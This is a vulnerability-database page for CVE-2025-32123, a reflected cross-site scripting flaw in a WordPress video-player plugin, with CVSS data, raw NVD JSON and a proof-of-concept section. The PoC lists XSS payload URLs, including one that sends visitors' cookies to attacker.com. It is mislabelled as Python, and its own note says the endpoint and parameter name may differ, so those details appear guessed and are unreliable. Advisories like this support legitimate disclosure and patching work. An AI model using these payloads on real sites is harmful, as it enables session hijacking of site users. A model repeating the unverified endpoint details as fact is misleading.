Security Vulnerability Report
中文
CVE-2025-32123 CVSS 7.1 HIGH

CVE-2025-32123

Published: 2026-01-22 17:15:54
Last Modified: 2026-04-27 19:16:13

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player with Playlist & Multiple Skins lbg-vp2-html5-rightside allows Reflected XSS.This issue affects HTML5 Video Player with Playlist & Multiple Skins: from n/a through <= 5.3.5.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

lbg-vp2-html5-rightside (HTML5 Video Player with Playlist & Multiple Skins) <= 5.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-32123 Reflected XSS PoC --> <!-- This is a educational example for security testing only --> <!-- Basic PoC URL structure --> <!-- Replace YOUR_TARGET_URL with the actual vulnerable URL --> <!-- Example 1: Simple alert payload --> https://example.com/wp-admin/admin-ajax.php?action=lbg_vp2_rightside_preview&param=<script>alert('XSS')</script> <!-- Example 2: Cookie stealing payload --> https://example.com/wp-admin/admin-ajax.php?action=lbg_vp2_rightside_preview&param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> <!-- Example 3: Event handler payload (without script tag) --> https://example.com/wp-admin/admin-ajax.php?action=lbg_vp2_rightside_preview&param=<img src=x onerror=alert('XSS')> <!-- Note: The actual vulnerable parameter name and endpoint may vary. Use browser DevTools to identify the exact request/response pattern. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32123", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:54.287", "lastModified": "2026-04-27T19:16:12.767", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player with Playlist & Multiple Skins lbg-vp2-html5-rightside allows Reflected XSS.This issue affects HTML5 Video Player with Playlist & Multiple Skins: from n/a through <= 5.3.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup HTML5 Video Player with Playlist &amp; Multiple Skins lbg-vp2-html5-rightside permite XSS Reflejado. Este problema afecta a HTML5 Video Player with Playlist &amp; Multiple Skins: desde n/a hasta &lt;= 5.3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-rightside/vulnerability/wordpress-html5-video-player-with-playlist-multiple-skins-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}